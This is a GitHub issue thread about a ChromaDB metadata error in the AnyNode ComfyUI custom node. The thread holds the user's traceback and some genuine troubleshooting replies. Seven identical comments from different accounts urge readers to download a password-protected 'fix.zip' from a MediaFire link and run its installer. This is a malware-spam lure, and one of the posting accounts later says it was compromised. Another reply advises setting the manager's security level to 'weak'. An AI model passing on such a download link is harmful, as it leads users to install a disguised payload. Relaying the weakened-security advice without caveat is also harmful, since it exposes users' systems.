### ISSUE TITLE
ValueError: Expected metadata value to be a str, int, float or bool, got None which is a NoneType

### ISSUE THREAD

**Issue by KirariSpark** [lks-ai/anynode#44]
```
got prompt
WARNING: AnyNode.IS_CHANGED() got an unexpected keyword argument 'prompt'

RUN-1 01-ai_Yi-1.5-9B-Chat-16K-8_0bpw_exl2 Take the input and multiply by 5 1 2


Finding Nodes in Workspace. kwargs: {'id': '1'}
{'prompt': 'Take the input and multiply by 5', 'function': 'An error occurred: API request failed with status code 500: Internal Server Error', 'imports': '', 'comment': None, 'input_types': "Type: <class 'int'>\nType: <class 'int'>", 'version': '0.1.2'}
!!! Exception during processing !!! Expected metadata value to be a str, int, float or bool, got None which is a NoneType
Traceback (most recent call last):
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\execution.py", line 317, in execute
    output_data, output_ui, has_subgraph = get_output_data(obj, input_data_all, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\execution.py", line 192, in get_output_data
    return_values = _map_node_over_list(obj, input_data_all, obj.FUNCTION, allow_interrupt=True, execution_block_cb=execution_block_cb, pre_execute_cb=pre_execute_cb)
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\execution.py", line 169, in _map_node_over_list
    process_inputs(input_dict, i)
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\execution.py", line 158, in process_inputs
    results.append(getattr(obj, func)(**inputs))
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\custom_nodes\anynode\nodes\any.py", line 414, in go
    self.last_hash = registry.add_function(prompt, self.script, self.imports, self.last_comment, [variable_info(any), variable_info(any2)])
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\custom_nodes\anynode\nodes\util_functions.py", line 57, in add_function
    self.add_function_to_chromadb(prompt_hash, prompt, function_code, imports, comment, input_types)
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\custom_nodes\anynode\nodes\util_functions.py", line 86, in add_function_to_chromadb
    collection.add(
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\python\lib\site-packages\chromadb\api\models\Collection.py", line 80, in add
    ) = self._validate_and_prepare_embedding_set(
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\python\lib\site-packages\chromadb\api\models\CollectionCommon.py", line 271, in _validate_and_prepare_embedding_set
    ) = self._validate_embedding_set(
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\python\lib\site-packages\chromadb\api\models\CollectionCommon.py", line 182, in _validate_embedding_set
    validate_metadatas(maybe_cast_one_to_many_metadata(metadatas))
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\python\lib\site-packages\chromadb\api\types.py", line 336, in validate_metadatas
    validate_metadata(metadata)
  File "C:\AI\StableDiffusion\Stable Diffusion ComfyUI Aki V1.2\python\lib\site-packages\chromadb\api\types.py", line 302, in validate_metadata
    raise ValueError(
ValueError: Expected metadata value to be a str, int, float or bool, got None which is a NoneType

Prompt executed in 0.01 seconds
```

and this is my workflow.it is a simple one created for testing.
![image](https://github.com/user-attachments/assets/c79c8dbb-62eb-4c34-af55-182344e1dda2)

local llm was loaded. please ignore last error, it was not caused by anynode.
![image](https://github.com/user-attachments/assets/6a7bfe1e-1637-428e-85cd-f700ca868fc0)

API URL was right, and there was no API key.
![image](https://github.com/user-attachments/assets/8f7e99c4-a403-429a-890a-511cd1b1a31a)

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
# **DO NOT DOWNLOAD ANYTHING I HAVE POSTED AS A COMMENT OR ANY OTHER MEDIAFIRE LINKS, MY ACCOUNT WAS COMPROMISED AND BEING USED TO COMPROMISE OTHERS AND YOURS WILL END UP BEING USED AS WELL**

**I AM WORKING ON DELETING AND POSTING THIS ON ALL THREADS IN WHICH THEY USED MY ACCOUNT TO POST THIS**

**Comment by Dibucci** [comment]
I'm getting this same issue, only im using OpenAI but everything is pretty much the same, my API key is in the env file, but no matter what i put into the node, i get the same output error like you have

**Comment by fengzeyuchen** [comment]
I also encountered the same error, and there was a rejection from the server, I tried to replace localhost with 127.0.0.1, and also tried to add/or /v1 at the end, but in fact, it is not useful, but there is no problem with the LLM service, I tested in the application and it can return normally
In addition, the local LLM node can not accept the input of pictures or videos, and it can not directly process the pictures as demonstrated. It has been tested for a long time, but it is a pity that it did not succeed. If there is any latest progress, please remember @me, thank you

**Comment by sako1989** [comment]
@XJF2332  
I tried to change comfyui manager security to weak and it works,
..\ComfyUI\custom_nodes\ComfyUI-Manager
you will find file config.ini , open it with notepad 
and set security_level = weak
I hope this will fix your issue

**Comment by Veilosity** [comment]
I'm getting this same error even with weak security for the manager. Is there any way around this? It seems like such a great node, but it always gives this same error no matter what I try.
